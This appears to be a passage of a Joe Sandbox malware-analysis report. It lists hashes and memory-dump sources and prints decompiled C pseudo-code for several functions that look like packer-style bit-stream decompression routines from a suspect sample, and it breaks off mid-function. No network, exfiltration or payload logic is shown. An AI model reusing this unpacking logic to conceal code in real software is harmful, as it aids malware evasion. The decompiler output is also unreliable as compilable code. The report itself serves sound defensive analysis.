    • Opcode Fuzzy Hash: 5fc0df7198c2952aa6d83230121b629796a3092540dfd5d9c69a865571978738
    • Instruction Fuzzy Hash: 1F810531E255079BDB18CE59C4812FEB7B3EBC0360F24C17DDA466B789C674A941CB80
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E012B6601(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
    				signed int _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				char _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				signed int _t61;
    				unsigned int _t64;
    				intOrPtr _t65;
    				signed int _t67;
    				unsigned int _t68;
    				signed int _t69;
    				unsigned int _t71;
    				signed int _t73;
    				signed int _t75;
    				void* _t76;
    				intOrPtr _t78;
    				void* _t79;
    				signed char _t84;
    				signed char _t85;
    				signed char _t86;
    				signed char _t88;
    				signed char _t89;
    				unsigned int _t91;
    				signed int _t92;
    				unsigned int _t93;
    				signed int _t94;
    				signed int _t95;
    				signed int _t100;
    				unsigned int _t101;
    				signed int _t102;
    				signed int _t104;
    				signed int _t106;
    				signed int _t119;
    				signed int _t125;
    				signed int _t133;
    				intOrPtr _t139;
    				intOrPtr* _t142;
    				void* _t146;
    
    				_t139 = __ecx;
    				_t84 = 0;
    				_t146 = 0;
    				_v28 = __edx;
    				_v24 = __ecx;
    				_t65 = 0;
    				_v16 = 1;
    				L1:
    				while(1) {
    					if(_t84 == 0) {
    						_t91 =  *(_t146 + _t139);
    						_t146 = _t146 + 4;
    						_t84 = 0x1f;
    						_t92 = _t91 >> 0x1f;
    					} else {
    						_t84 = _t84 - 1;
    						_t92 = _t64 >> _t84 & 0x00000001;
    					}
    					if(_t92 == 0) {
    						_v12 = _t65;
    						_t67 = 1;
    						L8:
    						L8:
    						if(_t84 == 0) {
    							_t93 =  *(_t146 + _t139);
    							_t146 = _t146 + 4;
    							_t85 = 0x1f;
    							_t94 = _t93 >> 0x1f;
    						} else {
    							_t85 = _t84 - 1;
    							_t94 = _t64 >> _t85 & 0x00000001;
    						}
    						_t95 = _t94 + _t67 * 2;
    						_v8 = _t95;
    						if(_t85 == 0) {
    							_t68 =  *(_t146 + _t139);
    							_t146 = _t146 + 4;
    							_t86 = 0x1f;
    							_t69 = _t68 >> 0x1f;
    						} else {
    							_t86 = _t85 - 1;
    							_t69 = _t64 >> _t86 & 0x00000001;
    						}
    						if(_t69 != 0) {
    							goto L19;
    						}
    						if(_t86 == 0) {
    							_t64 =  *(_t146 + _t139);
    							_t146 = _t146 + 4;
    							_t84 = 0x1f;
    							_t133 = _t64 >> 0x1f;
    						} else {
    							_t84 = _t86 - 1;
    							_t133 = _t64 >> _t84 & 0x00000001;
    						}
    						_t18 = _v8 * 2; // -2
    						_t67 = _t133 + _t18 - 2;
    						goto L8;
    						L19:
    						if(_t95 != 2) {
    							_t71 = ( *(_t146 + _t139) & 0x000000ff) + (_t95 + 0xfffffffd << 8);
    							_t146 = _t146 + 1;
    							if(_t71 == 0xffffffff) {
    								_t61 = _a8;
    								 *_t61 = _v12;
    								return _t61 & 0xffffff00 | _t146 == _v28;
    							}
    							_t100 =  !_t71 & 0x00000001;
    							_t73 = (_t71 >> 1) + 1;
    							_v8 = _t73;
    							_v16 = _t73;
    							L25:
    							if(_t100 == 0) {
    								if(_t86 == 0) {
    									_t101 =  *(_t146 + _t139);
    									_t146 = _t146 + 4;
    									_t88 = 0x1f;
    									_t102 = _t101 >> 0x1f;
    								} else {
    									_t88 = _t86 - 1;
    									_t102 = _t64 >> _t88 & 0x00000001;
    								}
    								if(_t102 == 0) {
    									_t75 = 1;
    									do {
    										if(_t88 == 0) {
    											_t64 =  *(_t146 + _t139);
    											_t146 = _t146 + 4;
    											_t89 = 0x1f;
    											_t104 = _t64 >> 0x1f;
    										} else {
    											_t89 = _t88 - 1;
    											_t104 = _t64 >> _t89 & 0x00000001;
    										}
    										_t75 = _t104 + _t75 * 2;
    										if(_t89 == 0) {
    											_t64 =  *(_t146 + _t139);
    											_t146 = _t146 + 4;
    											_t88 = 0x1f;
    											_t106 = _t64 >> 0x1f;
    										} else {
    											_t88 = _t89 - 1;
    											_t106 = _t64 >> _t88 & 0x00000001;
    										}
    									} while (_t106 == 0);
    									_t76 = _t75 + 3;
    									goto L47;
    								} else {
    									if(_t88 == 0) {
    										_t64 =  *(_t146 + _t139);
    										_t146 = _t146 + 4;
    										_t84 = 0x1f;
    										_t119 = _t64 >> 0x1f;
    									} else {
    										_t84 = _t88 - 1;
    										_t119 = _t64 >> _t84 & 0x00000001;
    									}
    									_t30 = _t119 + 3; // 0x3
    									_t76 = _t30;
    									L47:
    									asm("sbb edx, edx");
    									_v20 = _t76 +  ~0x500;
    									_t78 = _v12;
    									_t142 = _t78 - _v8 + _a4;
    									_v8 = _t142;
    									 *((char*)(_t78 + _a4)) =  *_t142;
    									_t79 = _t78 + 1;
    									_v8 = _v8 + 1;
    									do {
    										 *((char*)(_t79 + _a4)) =  *_v8;
    										_t79 = _t79 + 1;
    										_v8 = _v8 + 1;
    										_t50 =  &_v20;
    										 *_t50 = _v20 - 1;
    									} while ( *_t50 != 0);
    									goto L6;
    								}
    							}
    							if(_t86 == 0) {
    								_t64 =  *(_t146 + _t139);
    								_t146 = _t146 + 4;
    								_t84 = 0x1f;
    								_t125 = _t64 >> 0x1f;
    							} else {
    								_t84 = _t86 - 1;
    								_t125 = _t64 >> _t84 & 0x00000001;
    							}
    							_t27 = _t125 + 1; // 0x1
    							_t76 = _t27;
    							goto L47;
    						}
    						_v8 = _v16;
    						if(_t86 == 0) {
    							_t64 =  *(_t146 + _t139);
    							_t146 = _t146 + 4;
    							_t86 = 0x1f;
    							_t100 = _t64 >> 0x1f;
    						} else {
    							_t86 = _t86 - 1;
    							_t100 = _t64 >> _t86 & 0x00000001;
    						}
    						goto L25;
    					} else {
    						 *((char*)(_t79 + _a4)) =  *(_t146 + _t139);
    						_t65 = _t79 + 1;
    						_t146 = _t146 + 1;
    						L6:
    						_t139 = _v24;
    						continue;
    					}
    				}
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 56784c30bbe3f211566824a4ae5638e61b2e12fa3fa20e357c1d06f3d228e869
    • Instruction ID: 9e738b37f1101fda4dfdef0792ca20113aab9db2af3fbe58c673f7a6ccce9392
    • Opcode Fuzzy Hash: 56784c30bbe3f211566824a4ae5638e61b2e12fa3fa20e357c1d06f3d228e869
    • Instruction Fuzzy Hash: 56610735B2560787EB0CCE59C8C11FA77A3EBC4361B28C13DDE065B789E675D9819A80
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E012B5F21(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr* _a8) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				signed int _v28;
    				char _v32;
    				signed int _t83;
    				signed int _t88;
    				unsigned int _t90;
    				signed int _t92;
    				signed int _t94;
    				void* _t95;
    				char _t96;
    				signed int _t101;
    				signed int _t105;
    				signed int _t111;
    				signed char _t112;
    				signed char _t113;
    				signed char _t114;
    				intOrPtr _t118;
    				intOrPtr _t119;
    				signed char _t122;
    				void* _t125;
    				unsigned int _t129;
    				signed int _t130;
    				unsigned int _t131;
    				signed int _t132;
    				signed int _t133;
    				signed int _t138;
    				intOrPtr* _t141;
    				unsigned int _t147;
    				signed int _t148;
    				signed int _t150;
    				intOrPtr _t162;
    				unsigned int _t167;
    
    				_t83 = 0;
    				_v20 = __edx;
    				_t125 = __ecx;
    				_t111 = 0;
    				_v16 = 0;
    				_v28 = 1;
    				_v24 =  *_a8;
    				L1:
    				while(1) {
    					if(_t111 == 0) {
    						_t129 =  *(_t83 + _t125);
    						_t83 = _t83 + 4;
    						_t112 = 0x1f;
    						_t130 = _t129 >> 0x1f;
    					} else {
    						_t112 = _t111 - 1;
    						_t130 = _t167 >> _t112 & 0x00000001;
    					}
    					_v8 = _t112;
    					if(_t130 == 0) {
    						_v12 = 1;
    						L10:
    						L10:
    						if(_t112 == 0) {
    							_t131 =  *(_t83 + _t125);
    							_t83 = _t83 + 4;
    							_t113 = 0x1f;
    							_t132 = _t131 >> 0x1f;
    						} else {
    							_t113 = _t112 - 1;
    							_t132 = _t167 >> _t113 & 0x00000001;
    						}
    						_t133 = _t132 + _v12 * 2;
    						_v12 = _t133;
    						if(_t83 >= _v20 || _t133 > 0x1000002) {
    							goto L51;
    						}
    						if(_t113 == 0) {
    							_t167 =  *(_t83 + _t125);
    							_t83 = _t83 + 4;
    							_t114 = 0x1f;
    							_t88 = _t167 >> 0x1f;
    						} else {
    							_t114 = _t113 - 1;
    							_t88 = _t167 >> _t114 & 0x00000001;
    						}
    						if(_t88 != 0) {
    							if(_t133 != 2) {
    								if(_t83 >= _v20) {
    									goto L51;
    								}
    								_t90 = ( *(_t83 + _t125) & 0x000000ff) + (_t133 + 0xfffffffd << 8);
    								_t83 = _t83 + 1;
    								if(_t90 == 0xffffffff) {
    									 *_a8 = _v16;
    									return _t83 & 0xffffff00 | _t83 == _v20;
    								}
    								_t138 =  !_t90 & 0x00000001;
    								_t92 = (_t90 >> 1) + 1;
    								_v12 = _t92;
    								_v28 = _t92;
    								L30:
    								if(_t114 == 0) {
    									_t167 =  *(_t83 + _t125);
    									_t83 = _t83 + 4;
    									_v8 = 0x1f;
    									_t94 = _t167 >> 0x1f;
    								} else {
    									_t122 = _t114 - 1;
    									_v8 = _t122;
    									_t94 = _t167 >> _t122 & 0x00000001;
    								}
    								_t95 = _t94 + _t138 * 2;
    								if(_t95 != 0) {
    									L45:
    									asm("sbb ecx, ecx");
    									_t96 = _t95 +  ~0x500;
    									_t118 = _v16;
    									_v32 = _t96;
    									if(_t96 + _t118 > _v24 || _v12 > _t118) {
    										goto L51;
    									} else {
    										_t141 = _t118 - _v12 + _a4;
    										_v12 = _t141;
    										 *((char*)(_t118 + _a4)) =  *_t141;
    										_t119 = _t118 + 1;
    										_v12 = _v12 + 1;
    										do {
    											 *((char*)(_t119 + _a4)) =  *_v12;
    											_t119 = _t119 + 1;
    											_v12 = _v12 + 1;
    											_t75 =  &_v32;
    											 *_t75 = _v32 - 1;
    										} while ( *_t75 != 0);
    										_v16 = _t119;
    										goto L8;
    									}
    								} else {
    									_t101 = _t95 + 1;
    									L35:
    									L35:
    									if(_v8 <= 0) {
    										_t147 =  *(_t83 + _t125);
    										_t83 = _t83 + 4;
    										_v8 = 0x1f;
    										_t148 = _t147 >> 0x1f;
    									} else {
    										_v8 = _v8 - 1;
    										_t148 = _t167 >> _v8 & 0x00000001;
    									}
    									_t101 = _t148 + _t101 * 2;
    									if(_t83 >= _v20 || _t101 >= _v24) {
    										goto L51;
    									}
    									if(_v8 <= 0) {
    										_t167 =  *(_t83 + _t125);
    										_t83 = _t83 + 4;
    										_v8 = 0x1f;
    										_t150 = _t167 >> 0x1f;
    									} else {
    										_v8 = _v8 - 1;
    										_t150 = _t167 >> _v8 & 0x00000001;
    									}
    									if(_t150 == 0) {
    										goto L35;
    									} else {
    										_t95 = _t101 + 2;
    										goto L45;
    									}
    									goto L51;
    								}
    							}
    							_v12 = _v28;
    							if(_t114 == 0) {
    								_t167 =  *(_t83 + _t125);
    								_t83 = _t83 + 4;
    								_t114 = 0x1f;
    								_t138 = _t167 >> 0x1f;
    							} else {
    								_t114 = _t114 - 1;
    								_t138 = _t167 >> _t114 & 0x00000001;
    							}
    							goto L30;
    						} else {
    							if(_t114 == 0) {
    								_t167 =  *(_t83 + _t125);
    								_t83 = _t83 + 4;
    								_t112 = 0x1f;
    								_t105 = _t167 >> 0x1f;
    							} else {
    								_t133 = _v12;
    								_t112 = _t114 - 1;
    								_t105 = _t167 >> _t112 & 0x00000001;
    							}
    							_t27 = _t133 * 2; // -2
    							_v12 = _t105 + _t27 - 2;
    							goto L10;
    						}
    						goto L51;
    					} else {
    						if(_t83 >= _v20) {
    							L51:
    							return 0;
    						}
    						_t162 = _v16;
    						if(_t162 >= _v24) {
    							goto L51;
    						}
    						 *((char*)(_t162 + _a4)) =  *(_t83 + _t125);
    						_v16 = _t162 + 1;
    						_t83 = _t83 + 1;
    						L8:
    						_t111 = _v8;
    						continue;
    					}
    				}
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: f69abb42470e202d70792407f606e9f5084fa8231433eff183cf4fb132ad99ba
    • Instruction ID: 29675e0aa3e2e85ef0f03cd5f7ebca18f7893061ad37a3744e4dfd49bf8324f5
    • Opcode Fuzzy Hash: f69abb42470e202d70792407f606e9f5084fa8231433eff183cf4fb132ad99ba
    • Instruction Fuzzy Hash: B071D77692521ADBDF14CF89C4C16EDB772FF85364F2A41A9CA517B382C770A941CB80
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E012B5B49(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr* _a8) {
    				signed int _v8;
    				signed int _v12;
    				signed char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				signed int _v32;
    				signed int _t71;
    				void* _t74;
    				signed char _t76;
    				signed char _t77;
    				signed char _t78;
    				signed char _t80;
    				signed char _t81;
    				signed char _t87;
    				intOrPtr _t90;
    				signed int _t92;
    				void* _t94;
    				signed int _t96;
    				signed int _t98;
    				intOrPtr _t99;
    				void* _t100;
    				signed int _t102;
    				unsigned int _t107;
    				signed int _t108;
    				signed int _t110;
    				signed int _t112;
    				signed int _t115;
    				signed int _t119;
    				signed int _t120;
    				signed int _t121;
    				intOrPtr* _t125;
    				unsigned int _t130;
    				signed int _t131;
    				signed int _t133;
    				unsigned int _t145;
    
    				_t74 = __ecx;
    				_v24 = __edx;
    				_t76 = 0;
    				_t71 = 0;
    				_t90 = 0;
    				_v32 = 1;
    				_v28 =  *_a8;
    				while(1) {
    					_v20 = _t90;
    					if(_t76 == 0) {
    						_t107 =  *(_t71 + _t74);
    						_t71 = _t71 + 4;
    						_t77 = 0x1f;
    						_t108 = _t107 >> 0x1f;
    					} else {
    						_t77 = _t76 - 1;
    						_t108 = _t145 >> _t77 & 0x00000001;
    					}
    					_v16 = _t77;
    					if(_t108 == 0) {
    						goto L9;
    					}
    					if(_t71 >= _v24 || _t90 >= _v28) {
    						L48:
    						return 0;
    					} else {
    						 *((char*)(_t90 + _a4)) =  *(_t71 + _t74);
    						_t90 = _t90 + 1;
    						_t71 = _t71 + 1;
    						L8:
    						_t76 = _v16;
    						continue;
    					}
    					L9:
    					_v12 = 1;
    					L10:
    					L10:
    					if(_t77 == 0) {
    						_t145 =  *(_t71 + _t74);
    						_t71 = _t71 + 4;
    						_t78 = 0x1f;
    						_t110 = _t145 >> 0x1f;
    					} else {
    						_t78 = _t77 - 1;
    						_t110 = _t145 >> _t78 & 0x00000001;
    					}
    					_t92 = _t110 + _v12 * 2;
    					_v12 = _t92;
    					if(_t71 >= _v24 || _t92 > 0x1000002) {
    						goto L48;
    					}
    					if(_t78 == 0) {
    						_t145 =  *(_t71 + _t74);
    						_t71 = _t71 + 4;
    						_t77 = 0x1f;
    						_t112 = _t145 >> 0x1f;
    					} else {
    						_t77 = _t78 - 1;
    						_t112 = _t145 >> _t77 & 0x00000001;
    					}
    					if(_t112 == 0) {
    						goto L10;
    					} else {
    						_t115 = _v12;
    						if(_t115 != 2) {
    							if(_t71 >= _v24) {
    								goto L48;
    							}
    							_t94 = ( *(_t71 + _t74) & 0x000000ff) + (_t115 + 0xfffffffd << 8);
    							_t71 = _t71 + 1;
    							if(_t94 == 0xffffffff) {
    								 *_a8 = _v20;
    								return _t71 & 0xffffff00 | _t71 == _v24;
    							}
    							_t96 = _t94 + 1;
    							_v32 = _t96;
    							L24:
    							_v12 = _t96;
    							if(_t77 == 0) {
    								_t145 =  *(_t71 + _t74);
    								_t71 = _t71 + 4;
    								_t80 = 0x1f;
    								_t98 = _t145 >> 0x1f;
    							} else {
    								_t80 = _t77 - 1;
    								_t98 = _t145 >> _t80 & 0x00000001;
    							}
    							_v8 = _t98;
    							if(_t80 == 0) {
    								_t145 =  *(_t71 + _t74);
    								_t71 = _t71 + 4;
    								_t81 = 0x1f;
    								_t119 = _t145 >> 0x1f;
    							} else {
    								_t81 = _t80 - 1;
    								_t119 = _t145 >> _t81 & 0x00000001;
    							}
    							_t120 = _t119 + _t98 * 2;
    							_v16 = _t81;
    							if(_t120 != 0) {
    								L42:
    								_t99 = _v20;
    								asm("sbb ecx, ecx");
    								_t121 = _t120 +  ~0xd00;
    								_v8 = _t121;
    								if(_t121 + _t99 > _v28 || _v12 > _t99) {
    									goto L48;
    								} else {
    									_t125 = _t99 - _v12 + _a4;
    									_v12 = _t125;
    									 *((char*)(_t99 + _a4)) =  *_t125;
    									_t100 = _t99 + 1;
    									_v12 = _v12 + 1;
    									do {
    										 *((char*)(_t100 + _a4)) =  *_v12;
    										_t100 = _t100 + 1;
    										_v12 = _v12 + 1;
    										_t64 =  &_v8;
    										 *_t64 = _v8 - 1;
    									} while ( *_t64 != 0);
    									goto L8;
    								}
    							} else {
    								_v8 = 1;
    								L32:
    								L32:
    								if(_t81 == 0) {
    									_t130 =  *(_t71 + _t74);
    									_t71 = _t71 + 4;
    									_t87 = 0x1f;
    									_t131 = _t130 >> 0x1f;
    								} else {
    									_t87 = _t81 - 1;
    									_t131 = _t145 >> _t87 & 0x00000001;
    								}
    								_t102 = _t131 + _v8 * 2;
    								_v8 = _t102;
    								if(_t71 >= _v24 || _t102 >= _v28) {
    									goto L48;
    								}
    								if(_t87 == 0) {
    									_t145 =  *(_t71 + _t74);
    									_t71 = _t71 + 4;
    									_t81 = 0x1f;
    									_t133 = _t145 >> 0x1f;
    								} else {
    									_t81 = _t87 - 1;
    									_t133 = _t145 >> _t81 & 0x00000001;
    								}
    								_v16 = _t81;
    								if(_t133 == 0) {
    									goto L32;
    								} else {
    									_v8 = _v8 + 2;
    									_t120 = _v8;
    									goto L42;
    								}
    								goto L48;
    							}
    						}
    						_t96 = _v32;
    						goto L24;
    					}
    					goto L48;
    				}
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 1615f9a3bdffffc5273664e4e4254ec4cfde0530ca27db16a39bb6be12e29af4
    • Instruction ID: 2aab4c34e696b02d432fc8b635eba71aace63c63308ebf33810e22ee31322196
    • Opcode Fuzzy Hash: 1615f9a3bdffffc5273664e4e4254ec4cfde0530ca27db16a39bb6be12e29af4
    • Instruction Fuzzy Hash: B061A332D155179BDF18CE49C4816EDBB73EFC5364F3A8299CA466F386C670A942CB80
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E012B6177(void* __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr* _v16;
    				signed int _v20;
    				char _v24;
    				intOrPtr _v28;
    				unsigned int _t77;
    				signed int _t78;
    				void* _t81;
    				signed int _t83;
    				signed char _t84;
    				signed char _t85;
    				signed char _t86;
    				intOrPtr _t90;
    				intOrPtr _t91;
    				signed char _t94;
    				unsigned int _t97;
    				signed int _t98;
    				unsigned int _t99;
    				signed int _t100;
    				signed int _t102;
    				unsigned int _t104;
    				signed int _t106;
    				signed int _t108;
    				unsigned int _t114;
    				signed int _t115;
    				signed int _t117;
    				signed int _t133;
    				signed int _t138;
    				void* _t139;
    				intOrPtr* _t143;
    				signed int _t147;
    				signed int _t152;
    				signed int _t155;
    
    				_t155 = 0;
    				_t81 = __ecx;
    				_v28 = __edx;
    				_t83 = 0;
    				_v16 = 0;
    				_v20 = 1;
    				L1:
    				while(1) {
    					if(_t83 == 0) {
    						_t97 =  *(_t155 + _t81);
    						_t155 = _t155 + 4;
    						_t84 = 0x1f;
    						_t98 = _t97 >> 0x1f;
    					} else {
    						_t84 = _t83 - 1;
    						_t98 = _t77 >> _t84 & 0x00000001;
    					}
    					_v8 = _t84;
    					if(_t98 == 0) {
    						_v12 = 1;
    						L8:
    						L8:
    						if(_t84 == 0) {
    							_t99 =  *(_t155 + _t81);
    							_t155 = _t155 + 4;
    							_t85 = 0x1f;
    							_t100 = _t99 >> 0x1f;
    						} else {
    							_t85 = _t84 - 1;
    							_t100 = _t77 >> _t85 & 0x00000001;
    						}
    						_t133 = _t100 + _v12 * 2;
    						_v12 = _t133;
    						if(_t85 == 0) {
    							_t77 =  *(_t155 + _t81);
    							_t155 = _t155 + 4;
    							_t86 = 0x1f;
    							_t102 = _t77 >> 0x1f;
    						} else {
    							_t86 = _t85 - 1;
    							_t102 = _t77 >> _t86 & 0x00000001;
    						}
    						if(_t102 != 0) {
    							goto L19;
    						}
    						if(_t86 == 0) {
    							_t77 =  *(_t155 + _t81);
    							_t155 = _t155 + 4;
    							_t84 = 0x1f;
    							_t152 = _t77 >> 0x1f;
    						} else {
    							_t84 = _t86 - 1;
    							_t152 = _t77 >> _t84 & 0x00000001;
    						}
    						_t23 = _v12 * 2; // -2
    						_v12 = _t152 + _t23 - 2;
    						goto L8;
    						L19:
    						if(_t133 != 2) {
    							_t104 = ( *(_t155 + _t81) & 0x000000ff) + (_t133 + 0xfffffffd << 8);
    							_t155 = _t155 + 1;
    							if(_t104 == 0xffffffff) {
    								_t78 = _a8;
    								 *_t78 = _v16;
    								return _t78 & 0xffffff00 | _t155 == _v28;
    							}
    							_t138 =  !_t104 & 0x00000001;
    							_t106 = (_t104 >> 1) + 1;
    							_v12 = _t106;
    							_v20 = _t106;
    							L25:
    							if(_t86 == 0) {
    								_t77 =  *(_t155 + _t81);
    								_t155 = _t155 + 4;
    								_v8 = 0x1f;
    								_t108 = _t77 >> 0x1f;
    							} else {
    								_t94 = _t86 - 1;
    								_v8 = _t94;
    								_t108 = _t77 >> _t94 & 0x00000001;
    							}
    							_t139 = _t108 + _t138 * 2;
    							if(_t139 != 0) {
    								L38:
    								asm("sbb ecx, ecx");
    								_t90 = _v16;
    								_v24 = _t139 +  ~0x500;
    								_t143 = _t90 - _v12 + _a4;
    								_v16 = _t143;
    								 *((char*)(_t90 + _a4)) =  *_t143;
    								_t91 = _t90 + 1;
    								_v16 = _v16 + 1;
    								do {
    									 *((char*)(_t91 + _a4)) =  *_v16;
    									_t91 = _t91 + 1;
    									_v16 = _v16 + 1;
    									_t66 =  &_v24;
    									 *_t66 = _v24 - 1;
    								} while ( *_t66 != 0);
    								_v16 = _t91;
    								goto L6;
    							} else {
    								_t147 = _t139 + 1;
    								do {
    									if(_v8 <= 0) {
    										_t114 =  *(_t155 + _t81);
    										_t155 = _t155 + 4;
    										_v8 = 0x1f;
    										_t115 = _t114 >> 0x1f;
    									} else {
    										_v8 = _v8 - 1;
    										_t115 = _t77 >> _v8 & 0x00000001;
    									}
    									_t147 = _t115 + _t147 * 2;
    									if(_v8 <= 0) {
    										_t77 =  *(_t155 + _t81);
    										_t155 = _t155 + 4;
    										_v8 = 0x1f;
    										_t117 = _t77 >> 0x1f;
    									} else {
    										_v8 = _v8 - 1;
    										_t117 = _t77 >> _v8 & 0x00000001;
    									}
    								} while (_t117 == 0);
    								_t139 = _t147 + 2;
    								goto L38;
    							}
    						}
    						_v12 = _v20;
    						if(_t86 == 0) {
    							_t77 =  *(_t155 + _t81);
    							_t155 = _t155 + 4;
    							_t86 = 0x1f;
    							_t138 = _t77 >> 0x1f;
    						} else {
    							_t86 = _t86 - 1;
    							_t138 = _t77 >> _t86 & 0x00000001;
    						}
    						goto L25;
    					} else {
    						_v16 = _v16 + 1;
    						 *((char*)(_v16 + _a4)) =  *(_t155 + _t81);
    						_t155 = _t155 + 1;
    						L6:
    						_t83 = _v8;
    						continue;
    					}
    				}
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 45bc99e27de370642eb968c48229f4352b0d72fbd46c517c0aecccb0a9ab2d34
    • Instruction ID: 68ff084ef0b5a9829e9e88a48a9d99c896991c5e1d20b0638d13f12f2ddad159
    • Opcode Fuzzy Hash: 45bc99e27de370642eb968c48229f4352b0d72fbd46c517c0aecccb0a9ab2d34
    • Instruction Fuzzy Hash: BF61D936E255079BEB08CF58C4812EDB7B3FBC4350F258169DD566B389C770A942CB80
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E012B5D60(void* __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
    				signed int _v8;
    				signed int _v12;
    				signed char _v16;
    				intOrPtr* _v20;
    				signed int _v24;
    				intOrPtr _v28;
    				unsigned int _t64;
    				signed int _t65;
    				intOrPtr _t68;
    				signed int _t70;
    				signed int _t74;
    				signed char _t79;
    				signed char _t80;
    				signed char _t81;
    				signed char _t83;
    				signed char _t84;
    				intOrPtr* _t89;
    				signed char _t93;
    				unsigned int _t96;
    				signed int _t97;
    				signed int _t99;
    				signed int _t102;
    				void* _t106;
    				signed int _t107;
    				signed int _t109;
    				void* _t110;
    				intOrPtr _t112;
    				intOrPtr _t113;
    				unsigned int _t116;
    				signed int _t117;
    				signed int _t120;
    				void* _t131;
    				signed char _t132;
    
    				_t68 = _a4;
    				_t132 = 0;
    				_t131 = __ecx;
    				_v28 = __edx;
    				_t79 = 0;
    				_v20 = 0;
    				_v24 = 1;
    				L1:
    				while(1) {
    					if(_t79 == 0) {
    						_t96 =  *(_t132 + _t131);
    						_t132 = _t132 + 4;
    						_t80 = 0x1f;
    						_t97 = _t96 >> 0x1f;
    					} else {
    						_t68 = _a4;
    						_t80 = _t79 - 1;
    						_t97 = _t64 >> _t80 & 0x00000001;
    					}
    					_v16 = _t80;
    					if(_t97 != 0) {
    						_v20 = _v20 + 1;
    						 *((char*)(_v20 + _t68)) =  *(_t132 + _t131);
    						_t132 = _t132 + 1;
    						L6:
    						_t79 = _v16;
    						continue;
    					}
    					_v12 = 1;
    					do {
    						if(_t80 == 0) {
    							_t64 =  *(_t132 + _t131);
    							_t132 = _t132 + 4;
    							_t81 = 0x1f;
    							_t99 = _t64 >> 0x1f;
    						} else {
    							_t81 = _t80 - 1;
    							_t99 = _t64 >> _t81 & 0x00000001;
    						}
    						_v12 = _t99 + _v12 * 2;
    						if(_t81 == 0) {
    							_t64 =  *(_t132 + _t131);
    							_t132 = _t132 + 4;
    							_t80 = 0x1f;
    							_t102 = _t64 >> 0x1f;
    						} else {
    							_t80 = _t81 - 1;
    							_t102 = _t64 >> _t80 & 0x00000001;
    						}
    					} while (_t102 == 0);
    					_t70 = _v12;
    					if(_t70 == 2) {
    						_t107 = _v24;
    						L19:
    						_v12 = _t107;
    						if(_t80 == 0) {
    							_t64 =  *(_t132 + _t131);
    							_t132 = _t132 + 4;
    							_t83 = 0x1f;
    							_t109 = _t64 >> 0x1f;
    						} else {
    							_t83 = _t80 - 1;
    							_t109 = _t64 >> _t83 & 0x00000001;
    						}
    						_v8 = _t109;
    						if(_t83 == 0) {
    							_t64 =  *(_t132 + _t131);
    							_t132 = _t132 + 4;
    							_t84 = 0x1f;
    							_t74 = _t64 >> 0x1f;
    						} else {
    							_t84 = _t83 - 1;
    							_t74 = _t64 >> _t84 & 0x00000001;
    						}
    						_t110 = _t74 + _t109 * 2;
    						_v16 = _t84;
    						if(_t110 == 0) {
    							_v8 = 1;
    							do {
    								if(_t84 == 0) {
    									_t116 =  *(_t132 + _t131);
    									_t132 = _t132 + 4;
    									_t93 = 0x1f;
    									_t117 = _t116 >> 0x1f;
    								} else {
    									_t93 = _t84 - 1;
    									_t117 = _t64 >> _t93 & 0x00000001;
    								}
    								_v8 = _t117 + _v8 * 2;
    								if(_t93 == 0) {
    									_t64 =  *(_t132 + _t131);
    									_t132 = _t132 + 4;
    									_t84 = 0x1f;
    									_t120 = _t64 >> 0x1f;
    								} else {
    									_t84 = _t93 - 1;
    									_t120 = _t64 >> _t84 & 0x00000001;
    								}
    							} while (_t120 == 0);
    							_v16 = _t84;
    							_t110 = _v8 + 2;
    						}
    						_t68 = _a4;
    						asm("sbb ecx, ecx");
    						_v8 = _t110 +  ~0xd00;
    						_t112 = _v20;
